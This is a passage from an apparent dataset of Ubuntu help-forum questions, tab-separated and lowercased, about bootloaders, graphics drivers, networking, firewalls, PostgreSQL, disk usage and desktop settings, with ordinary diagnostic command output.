is formatted fat /dev/sdb1 contains /iso/live.iso /dev/sdb2 is formatted ext* /dev/sdb3 is formatted fat the mbr of /dev/sdb is otherwise not initialized you are executing from a linux based os installed on /dev/sda explain : how to install grub2 on to /dev/sdb1 , mark /dev/sdb1 active , be able to chose between /dev/sdb2 , /dev/sdb3 , and /iso/live.iso on boot .
197606	router and nas on same server	i got a ubuntu server that run smb , transmission-daemon and dns . in my home we are 9 people , with a total of 16 devices connected to the network . list of `` hardware '' 100mbit line in standard modem from isp 2x n600 wireless dual band gigabit router dumb gigabit switch ( not in use now ) right now i have connected it like this : line in - > modem - > router - > router . in `` prime time '' we got some spikes on the network ( this is on both cable and wlan ) . on a daily base we in total download/upload 22gb a day . i was wondering if i can set up my server with two more network cards , and set up those as router , then my network would look like this : line in - > modem - > server router - > switch - > 2x router . tldr : how to set up ubuntu server with 3 network cards , 1 for local server , 2 for router . i think the spikes comes from the poor router that is the connected to the modem .
197609	unresponsive script window pops up all the time now . why and what to do ?	i do n't know that it 's for the exact same script each time , it may be . a script on this page may be busy , or it may have stopped responding . you can stop the script now , or you can continue to see if the script will complete . script : chrome : //messenger/content/folderpane.js:721 this is in association with thunderbird i think . this does n't just happen after i 've stepped away for a long time . it happens every time i click on anything . things keep running that i 'm clicking on . just before this started as a constant problem , i was looking at addons etc , and something in thunderbird deactivated an old or expired javascript . i clicked on the update for that and after a while i found the best choice on the list and clicked download . i do n't know that anything happened with that and i moved away from addons etc area . the unresponsive script window started coming back all the time . every time i clicked on something in thunderbird and sometimes with firefox . i turned off firefox and restarted , but it did n't change . shut down firefox and computer restarted did n't change . the unresponsive script window is persistent now .
197613	monday as first day in gnome-shell ( instead of sunday )	i 've been dealing with different regional settings ( us , canada and other locations in english , as well as other countries and languages ) , but i can not get gnome-shell calendar to begin with monday , instead of sunday ( see image ) . i have even modified the `` en_us '' file in /usr/share/i18n/locales/ ( line : first workday : 1 ) . all without success . my question is if it is hard-coded in gnome-shell or it can be changed . answers to this previous question does n't apply to gnome-shell .
197616	ubuntu 12.4.1 failing in vm both vbox and vmware on new hp envy 4t-1000	brand new to linux , getting frustrated trying to get an environment up with ubuntu . my primary goal is to learn linux and apache/php development . i need to keep my windows os as main on my machine for work , so i 'm trying to virtualize ubuntu 12.4.1 without luck ( many attempts ) . i have a new hp envy 4t-1000 with 16gb ram , and 32 gb ssd caching with 500gb spindle hard drive . graphics card is an intel hd 3000 with amd radeon 7670m . with installing ubuntu desktop in vbox , i 'm getting this result : ubuntu installs failing . suspect hybrid ssd/spindle drive with vmware workstation 7 ( patched ) , i complete the install of ubuntu , it reboots , purple desktop briefly flashes then it drops to command line . i bought a beginning ubuntu book , and it recommends trying to manually configure graphics if this happens . so i tried doing a safe boot holding shift - i get to the first screen ( grub ) loads fine , and i choose recovery mode . after choosing the recovery mode , i get the recovery mode options , and can arrow down to what the book suggests 'run in fail safe graphic mode . ' once i select this option , i get a black screen with a large white dialogue box , at the top it says `` the system is running in low-graphics mode . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' then there is an ok button way down at the bottom . when i select 'ok ' i get a menu for a few options , book recommended 'reconfigure graphics . ' when i try this , i get a menu of two options : '' use generic ( default ) configuration use backup i 've tried both options several times , hitting ok just refreshes screen and nothing more . rebooting at this point just goes back to command line as before . i do n't know what to do at this point , i 've spent too many hours this weekend trying in both vbox and vmware to get ubuntu going . is n't there like a very basic graphic display or something i can use to at least get into the desktop ? i explored the grub some more , and tried to look at the startup and xserver logs - both are blank . no help there i guess ? when i try to choose 'edit the configuration file , then 'ok ' screen just refreshes on same menu options , nothing happens . thanks for any advice . i really need to focus on learning linux , apache and php , so perhaps ubuntu just wo n't work on my hardware ? any other suggestions ? i will need to virtualize .
197623	wifi card driver install problems	i have a linksys wireless g pci adapter with drivers for windows downloaded . i have tried this method : cd /home/username/desktop/filename/drivers ( with the correct information , of course ) i then received an error saying no such file or directory when the drivers are on the desktop . i have partitioned the hard drive , so i have xp and ubuntu 12.04 . the card works perfectly fine on xp , but i would like to get the drivers working for ubuntu .
197624	iptables -l lags on non localhost or anywhere address	i am trying to configure iptables for ubuntu 10.04 and i have a problem with iptables -l lagging on rows where the destination or source address is not localhost or anywhere . the following entries will cause lag on their row : iptables -a input -p tcp -- dport 111 -s 192.168.1.14 -j accept iptables -a input -p tcp -- dport 90 -d 192.168.1.14 -j accept while this does not : iptables -a input -p tcp -- dport localhost -s 192.168.1.14 -j accept iptables -a input -p tcp -- dport localhost -d 192.168.1.14 -j accept i feel like this might be due to iptables checking to see if the ip is reachable . if not , what is the cause , if it is how can i disable it ?
197626	where is a postgresql 9.1 database stored in ubuntu 12.04 ?	i installed and created a postgresql database on ubuntu . i then created the database using the following command : sudo su postgres createdb mydatabase however , i ca n't figure out where the database was initialized . i would like to be able to edit the hba.conf file and postgresl.conf files . when i view the database using pgadmin i see the following information : create database mydatabase with owner = postgres encoding = 'utf8' tablespace = pg_default lc_collate = 'en_us.utf-8' lc_ctype = 'en_us.utf-8' connection limit = -1 ; any thoughts on how i can find the database cluster location ?
197628	how do i find my network ip , netmask , and gateway info ?	i 'm trying to make my ip static as i hear it fixes slow browsing issues . when i click on connection information under the networking menu of the gray taskbar , it tells me about the ip , subnet mask , and dns , but nothing about the gateway . i would like to know if there 's a terminal command to find the information .
197633	any way to list similar commands ?	when you write the command name wrong , bash often does this : septi @ norbert : ~ $ good no command 'good ' found , did you mean : command 'gold ' from package 'binutils ' ( main ) command 'gmod ' from package 'gmod ' ( universe ) command 'goo ' from package 'goo ' ( universe ) command 'god ' from package 'god ' ( universe ) command 'geod ' from package 'proj-bin ' ( universe ) command 'gord ' from package 'scotch ' ( universe ) good : command not found or sometimes it does this : septi @ norbert : ~ $ nftp no command 'nftp ' found , but there are 23 similar ones nftp : command not found is there any way to ask bash to show these 23 similar commands for me ? and , is there a way to show similar commands , including those that are n't yet installed , instead of running the application , ftp for example ?
197635	how to solve `` controller 'ide controller ' does not support hotpluggin '' ?	i install virtualbox from apt-get . when i want to set shared folders , it shows controller 'ide controller ' does not support hotpluggin '' . how to solve it ? thank you~
197638	gnupg v1.4.10 cant read	i was thinking of `` getting involved '' with ubuntu and decided to join the bug squad . after a few steps of joining , i got an email with a openpgp key licenced at gnu version 1.4.10 and went on their website . they recommended me a couple of apps that can decode the code , but none of them worked , in fact each of them said that the code is corrupted . i thought that there 's something wrong with that email , so i resent the request . as i got another email and tried the code with those programs , the programs said the same thing . how can i decode the code properly ? is there an online website that would be able to convert it ? ? any suggestions ?
197642	ubuntu 12.04 usb ( hp )	i have put ubuntu 12.04 on a usb ( kingston 8gb ) and i go to install and i ca n't it gives options for erase and something else i have 4 primary partitions win7 for my main partition and 3 created by hp hp_tools , hp_recovery and system to get to my point how do i install ubuntu on hdd i have a hp probook 200 notebook pc . can i remove any partitions ? when i do sudo fdisk -l this comes up disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3ed7e7b0 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 946591743 473091072 7 hpfs/ntfs/exfat /dev/sda3 946591744 976560127 14984192 7 hpfs/ntfs/exfat /dev/sda4 976560128 976771119 105496 c w95 fat32 ( lba ) disk /dev/sdb : 7803 mb , 7803174912 bytes 122 heads , 58 sectors/track , 2153 cylinders , total 15240576 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 15240575 7616256 c w95 fat32 ( lba )
197644	falied installing ati x.org binary driver ! ! ( ati radeon hd 5400 )	the open source driver worked well with the fresh installation of ubuntu 12.04 , but it drains my laptop battery faster . so i installed the proprietary driver from jockey-gtk . it gave me this error message at the end of the installation : after restarting the computer , i lost all the compositing animations . compiz visual effects do n't work . there is a black boarder around docky . i tried : sudo apt-get -- purge remove fglrx* ... which cleaned up the proprietary driver so i could install it again , but the same issue occurred again . fglrxinfo returns this : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 139 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 here is the jockey.log & the fglrx installation log please somebody help me ... ! thanks !
197649	launcher icon differences in pixels between monitors usign same resolution	today i got to test a samsung syncmaster 2043nwx . my normal monitor was a 1080p soniview tv that supports 1920x1080 . i use 1680x1050 ( 16:10 ) as my common resolution . my amazed is when i see that the launcher icons looks more to a `` correct size '' of 32px to what they show in my soniview where they actually take about 50 % more using the same resolution . they are both the same resolution but in the soniview the launcher icons look 50 % bigger than the ones in the samsung . my question is then , why the difference between both monitors since they are using the same resolution but are showing different launcher icon sizes .
197651	how do i change the resolution on an asus 101mt ?	i 've been looking for a fix , but no luck . my asus 101mt has a maximum resolution of 1024x768 , but i can not select this in `` displays '' since it is not an option . i have added this resolution before , but now i ca n't seem to find the same information . i just did a clean install with 12.04 . i am also dual booting with win 7 . i have been trying to get this working for a while and now i switched to 12.10 . i tried using xrandr , but this is as far as i get . barzyk @ barzyk-t101mt : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 600 , maximum 4096 x 4096 lvds1 connected 1024x600+0+0 ( normal left inverted right x axis y axis ) 220mm x 129mm 1024x600 60.0*+ 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) barzyk @ barzyk-t101mt : ~ $ cvt 1024 768 # 1024x768 59.92 hz ( cvt 0.79m3 ) hsync : 47.82 khz ; pclk : 63.50 mhz modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync barzyk @ barzyk-t101mt : ~ $ xrandr -- newmode `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync barzyk @ barzyk-t101mt : ~ $ xrandr -- addmode lvds1 1024x768_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 25 current serial number in output stream : 26 any thoughts ?
197653	usb live no hardisk	ok so i own a toshiba laptop , and the thing is my hdd went bad , but i had a usb flash drive with i live cd ubuntu on it . now i do n't have and hdd plugged in my laptop i 'm only with a flashdrive . my question is how much memory does this live cd support cause my flash drive is 32 gigs and after about 1.5 gigs of downloads a screen shows up and tells me that i do n't have enough space left . the other thing is i do n't have money to get a hdd right now so i wan na use this flash drive for now but can i somehow customize the cd through the live edition so i could have programs that i need after restarts i tried with customization live cd but when i run it , it stops and in my terminal it says could not execute not enough space . so if anyone can tell me what can i do with this problem i 'm having with space on my live usb ubuntu .
197658	macbook install : no mountable file systems	i own a macbook pro running mountain lion . i would like to dual-boot my mac os with ubuntu . when i download the file and try to open it , it reads `` no mountable file systems '' . i have downloaded both the 64 and 32 bit software . can someone help me through this process ?
197661	how do i programmatically determine all the non-minimized ( visible ) windows on screen ?	i would like to programmatically determine all of the visible windows on the desktop so that i can place my window , if possible , so that it does not cover up other windows . it is possible to do this using the wnck package ( libwnck-3-dev , to be exact ) on ubuntu 12.04 . however , in order to actually compile and link in code from wnck , you must define the symbol wnck_i_know_this_is_unstable ( you get a compile error otherwise ) . this makes me think that this interface is not intended to be relied on . the interface is very good ( provides window name , geometry , whether the window is minimized or maximized , and other information ) much more easily than raw xlib calls , and i think some information ( minimization ) is not even available from xlib . but i would like to use a stable interface , as i do n't want to have to reprogram everything a year down the road . so : thanks in advance for any pointers to a preferred way of getting a list of windows , and determining the geometry ( placement ) of each , and the minimization state of each .
197662	how do i auto copy cd contents on insertion ?	i 'm looking to auto copy the contents off of a disc on insert to a specified directory . it 's not a dvd or cd simply one data file on every disc , would it be possible to do this with a shell script ?
197665	not able to install any application using ubuntu software centre on 12.4 lts	libcdt4 libcommon-sense-perl libencode-locale-perl libextutils-depends-perl libextutils-pkgconfig-perl libfile-listing-perl libfile-which-perl libfont-afm-perl libgnome2-0 libgnome2-canvas-perl libgnome2-gconf-perl libgnome2-perl libgnome2-vfs-perl libgnome2-wnck-perl libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgoo-canvas-perl libgoocanvas-common libgoocanvas3 libgraph4 libgtk2-imageview-perl libgtk2-unique-perl libgtkimageview0 libgvc5 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libhttp-server-simple-perl libilmbase6 libio-socket-inet6-perl libio-socket-ssl-perl libjson-perl libjson-xs-perl liblqr-1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmailtools-perl libnet-dbus-perl libnet-http-perl libnet-ssleay-perl libnetpbm10 libopenexr6 libpath-class-perl libpathplan4 libproc-processtable-perl libproc-simple-perl libsocket6-perl libsort-naturally-perl libtie-ixhash-perl libtimedate-perl libunique-1.0-0 liburi-perl libwww-mechanize-perl libwww-perl libwww-robotrules-perl libx11-protocol-perl libxml-namespacesupport-perl libxml-parser-perl libxml-sax-base-perl libxml-sax-expat-perl libxml-simple-perl libxml-twig-perl libxml-xpath-perl netpbm shutter
197666	what gui firewall manager should i use to replace firestarter ?	apparently firestarter is no longer maintained , and it does not have any options in its interface for handling the connection to a vpn . right now , my vpn does not work if my firewall is activated . i would like to find an alternative gui firewall manager that will let me make configurations to accomodate my vpn service . which should i use , and what considerations should i take into account when migrating from firestarter ? i did a google search , and tried to restrict results within the last year , but it seems people are still recommending firestarter , despite it not being maintained . with almost near certainty , someone will probably suggest that i just manage my `` iptables '' from the command line . please understand that i am not interested in a command line interface for managing my firewall . thanks .
197667	i need help with grub and restoring windows ?	i started out with windows xp and then i installed zorin ( a sub distro of ubuntu ) and then i installed ubuntu . this was working great . then i installed windows 8 on yet another partition and could n't get into my other oss . i asked my tech teacher at school how to fix it and she said just clear the partition that i installed windows 8 on , so i booted onto a live version of ubuntu and cleared the windows 8 partition . okay then i rebooted and it still went into windows 8 for some reason . so i got back onto live ubuntu and it turns out windows 8 partition did n't clear for some reason so i did it again ( and i 'm positive it was the windows 8 partition ) . i still could n't fix grub but i needed something out of my xp partition so i mounted it on the live ubuntu and now all the xp partition have are the folders 'boot ' , 'recovery ' , 'system volume information ' , 'temp ' and the files 'bootmgr ' , 'bootnxt ' , 'bootsect.bak ' and 'recovery.txt ' . anybody know how to fix this or what i did wrong ? also , if i try booting from my hard drive it shows the windows and says 'preparing automatic repair ' then 'diagnosing your pc ' then restarts . any and all help is greatly appreciated .
197670	how could i see the keyboard layout in xfce ?	in gnome keyboard settings , there 's a window in which you can see the layout , a keyboard with buttons and characters on them like this : in xfce ( xubuntu 12.04 ) there 's no such program . what can i install to see it ?
197674	apache2 syntax error , ca n't access 000-default	i have been using apache2 and webmin with my raspberry pi . after a restart and reinstallations apache wo n't start . > sudo /etc/init.d/apache2 restart apache2 : syntax error on line 268 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/sites-enabled/000-default : no such file or directory action 'configtest ' failed . the apache error log may have more information . failed ! the file 000-default is there and unopenable permissions to root-root . my apache2.conf file looks like this ( bottom half ) : # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog $ { apache_log_dir } /error.log # # loglevel : control the number of messages logged to the error_log . # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . # loglevel debug # include module configuration : include mods-enabled/*.load include mods-enabled/*.conf # include list of ports to listen on and which to use for name based vhosts include ports.conf # # the following directives define some format nicknames for use with # a customlog directive ( see below ) . # if you are behind a reverse proxy , you might want to change % h into % { x-forwarded-for } i # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see the comments above for details . # include generic snippets of statements include conf.d/ # include the virtual host configurations : include sites-enabled/ < virtualhost *:80 > documentroot /var/www < directory /var/www > allow from all options +indexes < /directory > servername imaserver < /virtualhost > does anyone know what is the cause of this ?
197676	grub menu lists windows xp fails to boot	my first question was answered on how to get the boot menu to appear using ubuntu 12.04.01 . it now does . the second part of the problem is that when windows xp is selected the screen blanks with a cursor flashing briefly , a message flashed up too fast to read , and returns to the menu . after performing this 20 or so times i have figured out what the message is . it reads `` error : no video mode activated '' . i have tried to enter text in the grub.cfg file as per another post but it did not help . i looked at the menu contents while there and the information there is similar to the grub.cfg file but definately not the same . the menu contents are as follows : insmod part-msdos insmod ntfs set root= ' { hd0 , msdos1 } ' search -- no floppy -- fs -uuid -- set=root 01cda33b881aad20 -- drivemap -s ( hd0 $ { root } chainloader +1 i read a post about getting something called boot-repair but i am unable to find this and the terminal window says there is no such package . i assume it means that it is not installed . i have installed ubuntu 12.04.01 if that helps .
197678	splash screen issues after force restart	recently a friends computer was shut down after a force restart and now it says `` 12.04 '' and a bunch of command text bleeds through the purple background . my guess is the plymouth configuration got corrupt..how do i fix this i
197693	wired connection stops working suddenly	i have ubuntu 12.04 . i was downloading something via aria ... and then it suddenly stopped . there was no connection to the internet . i tried to ping the host but there was no reply . also tried to ping the route 192.168.250.1 but there was no reply . i got a message saying 'ubuntu 12.04 has experienced internal error ' . i restarted system but nothing was sorted out . the wired connection 'establishes ' but i am not able to use internet or ping either to host/route/8.8.8.8 . the wireless is working fine and it does connect to internet . i have a static ip address for a wired connection and it connects to internet on windows os installed on the same laptop with same ip settings . please suggest how i can get my wired connection to start working properly again .
197694	xfce4 - deactive rolling in of window	how can i stop the behaviour that when i put my cursor over the title bar and then turn my mouse wheel , the window gets rolled in ? it is really annoying and happens accidentally quite often .
197702	is it possible to execute terminal commands using php ?	is it possible to execute terminal commands using php ? i need to display cores alloted to each vm and some other details of the virtual machine . am using kvm . can anyone help to do so . am using ubuntu server 11.04 . can anyone explain with example .
197706	ubuntu 12.04 3d loads when booting from usb but not after install	so i was trying to install ubuntu on my samsung q230 laptop . at first when i boot from live usb it loads unity 3d . i checked with : echo $ desktop_session it says ubuntu . also for the unity support test it confirmed that my laptop can run 3d . however after installing , it only loads 2d and when i try to run the unity support test it says glx missing . why is it like that ? thanks in advance !
197707	how can i install ie8 or ie9 in ubuntu 12.04 ?	usually i 'm surfing the web by chrome or firefox browser in my laptop but some website force to use ie8 browser to get full benefit . i 'm not interested to use virtual box . is there any way to install ie8 or ie9 using wine ?
197708	best partition scheme for ubuntu + windows with efi and gpt	i am guessing which is the better partition scheme for a system with efi and gpt . currently , i have the following scheme : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 190.8m 0 part /boot/efi ├─sda2 8:2 0 83.8g 0 part / ├─sda3 8:3 0 379.9g 0 part /home └─sda4 8:4 0 1.9g 0 part [ swap ] i need to install windows ( 7 or 8 ) along ubuntu , so , when 12.10 arrive , i plan reinstalling my ubuntu 12.04 and add a windows 7 partition . the problem is that efi systems with linux + windows can be a mess of partitions . once i tried it on a machine at work and i ended with an untidy hard disk . i have read configure dual boot , windows 7 and ubuntu 12.04 with or without efi but it does not answer my problem . at the end of the process i would like to have something like name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 190.8m 0 part /boot/efi ├─sda2 8:2 0 83.8g 0 part / ├─sda3 8:3 0 300.0g 0 part /home └─sda4 8:4 0 1.9g 0 part [ swap ] └─sda5 8:5 0 79g 0 part /windows my questions are : is it possible to get an scheme like the above one , without windows boot partitions ? . it would be nice if windows can place its .efi file in the efi partition ( sda1 in the scheme ) . i can choose between a windows 7 and a windows 8 os . would it be the best choice to put the windows partition at the end of the disk ? which should be the process ? ( partitioning from live cd or from windows , windows installation , ubuntu installation , and possible additional steps ) . thanks in advance
197718	how to resolve `` network host is busy ; will retry in 30 seconds '' ?	i have added a network printer , a konica minolta c253 , via cups by its ip ( http : //10.0.0.42 ) under the http : //localhost:631/ cups webfrontend on an ubuntu 11.10 client . i used the documented koc353u.ppd in the process . i was able to print exactly one page . afterwards , all i get in the printer 's status is the message : `` network host '10.0.0.42 ' is busy ; will retry in 30 seconds '' . what is the problem here and how do i resolve it ?
197719	disk space suddenly 100 % used ?	i 'm trying to identify why , suddenly , 100 % of our disk space is in use . i have already rebooted but the issue persists . here are the outputs of some commands that are showing some strange ( for me ) results : danny @ hydrogen : ~ $ df -h filesystem size used avail use % mounted on /dev/cciss/c0d0p1 130g 122g 949m 100 % / none 1.9g 196k 1.9g 1 % /dev none 2.0g 0 2.0g 0 % /dev/shm none 2.0g 40k 2.0g 1 % /var/run none 2.0g 0 2.0g 0 % /var/lock none 2.0g 0 2.0g 0 % /lib/init/rw danny @ hydrogen : / $ sudo du -chs / du : can not access `/proc/1662/task/1662/fd/4 ' : no such file or directory du : can not access `/proc/1662/task/1662/fdinfo/4 ' : no such file or directory du : can not access `/proc/1662/fd/4 ' : no such file or directory du : can not access `/proc/1662/fdinfo/4 ' : no such file or directory danny @ hydrogen : / $ df filesystem 1k-blocks used available use % mounted on /dev/cciss/c0d0p1 135342296 128144108 323104 100 % / none 1991336 196 1991140 1 % /dev none 1995788 0 1995788 0 % /dev/shm none 1995788 40 1995748 1 % /var/run none 1995788 0 1995788 0 % /var/lock none 1995788 0 1995788 0 % /lib/init/rw danny @ hydrogen : / $ mount /dev/cciss/c0d0p1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) danny @ hydrogen : / $ sudo du -h -- max-depth=1 634m ./premvet_sync 5.6m ./etc 4.0k ./opt 16k ./lost+found 7.4m ./bin 623m ./lib 196k ./dev 0 ./sys 4.0k ./srv 4.0k ./cdrom 8.0k ./media 52k ./tmp ... it hangs for ages here ... .. the server is running ubuntu 10.04.4 lts . system load : 2.85 temperature : 8 c usage of / : 94.7 % of 129.07gb processes : 132 memory usage : 39 % users logged in : 0 swap usage : 0 % ip address for eth0 : 192.168.1.124 = > / is using 94.7 % of 129.07gb i 'm struggling to comprehend why this is happening ! any pointers would be appreciated .
197721	help finding good players that would display music library as folder structure	i have a big music library . nothing special there . but i very much dislike the way usually music library is displayed in most recommended players , according to artist/album/year/genre tags , ignoring my folder structure or making it hardly accessible . the problem is that not all my music is tagged according to genre etc , but all is perfectly ordered by folder structure which takes into account all characteristics handled by tags , as well as many others , which i can change and specify at any time . ( i can decide ordering my music by country , inside a sub-category like `` baroque music '' , for example ) . the advantage of using folder-structure-display of medialibrary is that all the logical structure is displayed , with all sub-categories , which can be sub-detailed , varied , and changed at wish and be all visible at the same time . some players , like clementine and quod libet , can display folders , but when comes to displaying only the library , they still display it only by tags . i am looking for some plugins to good players that would provide a solution to this , and i am looking for different solutions to this . therefore i 'll display as my own answer some solutions that i have already found and welcome other answers with new and better ways to achieve the same purpose . ( most welcome are of course players that , beside having the capability discussed here , would not lack other elementary features like playlists in tabs , search , and the like . )
197726	should `dist-upgrade` be followed with a reboot ?	following a periodic , in my case weekly , run of : apt-get update apt-get dist-upgrade is there much benefit from rebooting ?
197731	how to run a command within a time duration per min/sec ?	i want to run a command/shell script say script.sh from 1am to 2am per minute . after observing that crontab ca n't work it out 'per sec ' i had to go with 'per min ' . basically , my server.sh file takes backup of my database on server . this is done by three text files with names of tables in it , hence creating three backup archives . these backup archives are named like 'prefixyyyymmdd ' , where prefix = heavy/light/weekly according to the backup type . now i want to copy these particular files after they are stored on server . suppose the backup on server took 15 min . now i should run the copy script-client.sh on my local computer . as this copy script does n't know the names of the files just created by server , it should run per sec/min in the interval those files are being created by server and grab that file . how to use crontab per min/sec within that time interval ?
197739	vlc - youtube videos wo n't play anymore	i would like to play youtube videos on vlc . i am newbie ( one of mac os re , but can fallow instructions : ) when i enter address on network stream nothing happens it is on the playlist but nothing happens it is not playing . i have a firewall if it helps : ) problem solved thanks to your help ! !
197741	alt+q close window does n't work	i 'd really like to use alt+q to close windows as it fits with my mac-like muscle memory . however , i ca n't get this combination to work . i 've changed it in the keyboard settings under shortcuts and also changed all the instances of close window i can find in gconf editor . i 'm using cinnamon and my alt key works for all manner of other things ( like switching windows ) . any help greatly appreciated .
197743	how to launch ubuntu center from my application ?	my java application needs this library libswt-webkit-gtk-3-jni to run successfully . so if the user does n't have this library installed , i want ubuntu software center to be launched and tell the user `` you should have this library '' . is that possible ?
197746	error '' could not update iceauthority file '' and '' problem in configuration server ''	when i start my laptop and try to login , i 'm facing these messages : could not find iceauthority and problem with configuration server /use/lib/libgconf2-4/gconf-santy-check-2 exited with status 256 . after closing both error windows , if i press ctrl+alt+t the terminal window opens normally . i tried hardly but unable to solve these problems . if any one can , please help me .
197750	how can i play `` .msv '' audio file ?	.msv is a sony audio file type . how can i play this file on 12.04 ?
197752	high resolution graphics laptop misconfiguration ( 1920x1200 15,6 `` )	after searching all similar topics , i found no answers concerning a configuration issue on kubuntu 12.04 on a nw6440 compaq laptop with 1920x1200 display . as the standard size of police was displaying very tiny characters , i tried several approaches to get a readable display , using configuration center to change the police size , but as there is almost nothing explaining which line does what , the results were not that good , especially using firefox , and the new device notification that shows strangely overlapped characters in a too small display box , so that clicking on the right place to get an action done ( open with dolphin , read with ... ) is very uncertain . my questions are : why is it so difficult to get such a display correctly working ? 1366x768 or 1280 x 1024 is not making any difficulties , it seems to be a very basic problem of scaling , bu ca n't find a simple solution . does someone have an idea about where to find correct , precise and brief instructions in order to fix this very annoying problem ?
197756	how to open a gui app from terminal without losing terminal input	if i have a terminal open in x-window , i can start a gui app from the terminal . if i give ctrl+c , the gui app closes and you get back the prompter in the terminal so you can write commands again . for example : if i run gedit , it starts but it does n't return control to that console so i can not reuse it for other commands , if i want to regain control i need to do ctrl+c , but that closes the gui app . i need the gui app to keep running but also to use further the console to start other apps or run other commands . how to start a x-window app from terminal console , without leaving that console occupied solely by that app ?
197760	problem with partitions and 12.04	can i have some help ? i tried to install ubuntu 12.04 on my laptop , that has some partitions : 2 ntfs ( one of them is restricted by the system ) 2 ext4s 1 linux swap but when i insert my cd , and run livecd ( as i am now ) , the installer ca n't see any of my partitions , it can see only /dev/sda as unallocated place , so does gparted ( fdisk seems ok ) . on these partitions i have data , that i can use by windows on ntfs 's . here is some of this data : the results from running parted : root @ ubuntu : ~ # parted gnu parted 2.3 użycie /dev/sda witamy w gnu partedzie ! listę poleceń można zobaczyć po napisaniu 'help ' . ( parted ) print błąd : nie można mieć partycji poza dyskiem ! ( parted ) ( it says : error : you ca n't have partition out of a disc ! or something like that )
197771	how do i enable low graphics mode ( llvmpipe rendering ) in unity ?	i 've been looking at other questions , but none seem to answer my query . the closest i got gave me information about a ppa for 12.04 . my computer 's battery life is suffering under ubuntu 12.10 . i imagine the performance will be better if i use llvmpipe , as it is aimed at lower end computers . how do i enable llvmpipe ? i might add that going back to 12.04 is not an option , as my computer only works in unity 2d , which did n't quite do it for me . as far as i understand , llvmpipe is pretty much the same as regular unity . however , i ca n't seem to find much information about it . if this is wrong , correction would be much appreciated .
197772	what are the differences between sudo , su , visudo , chroot , and gksu ?	what are the differences between sudo , su , visudo , chroot , and gksu ?
197778	how to change `` open with '' with force and fury ?	this question is obviously not a duplicate as actual reading more than one sentence will show . every [ too often ] in a [ forever ] there will be problems with the open with context menu item . i 've seen it changed around a lot , and it 's still horrible . applauds now once again i 've got a corrupt item that i want to replace with the correct item that is installed cleanly into the application menu . i updated a program , and although all traces of the old are gone , the context-menu insists on living in the past . i can not for the love of me find a fix . what did i do ? i installed the ( awesome and overshadowing all the other excuses for image viewers for linux out there ) xnviewmp image viewer . then sometime later , i updated it . the old one was started with /usr/local/share/xnviewmp/xnview.sh . the new one with /usr/sbin/xnview i tried the basic faqs out there . there is the open with - > more - > show other applications - > xnview that just gives me an error about /usr/local/share/xnviewmp/xnview.sh not existing . i know ! there is the open with tab in the file properties that has the option to forget an association , but that does n't do anything . i can reset the association . then i can add xnview again , but it has the same problem . to the idiots that closed this question as a duplicate of this one : the solution there is exactly what i am talking about here ! it 's different and not applicable here . you ruined a perfectly good question ! thanks a lot . i just need to know where this little open with system gets its information* , use a hammer and a blowtorch on whatever files it uses , and manually enter the same path that the application menu is clever enough to use . i 've got the hammer and the blowtorch . now where are the files i am looking for ? * * ) i have marked the most important sentences to help people understand that this is not a duplicate question of the one it 's marked for . answered my own question /usr/share/applications/*.desktop global ( root ) applications , you cann add default mimetypes here : mimetype=image/bmp ; image/gif ; image/tiff ; image/jpeg ; image/x-psp ; image/png ; image/jp2 ; image/jpeg2000 ; image/jpx ; /usr/share/applications/defaults.list contains these global associations in a single file , which is created from all the .desktop files from time to time . 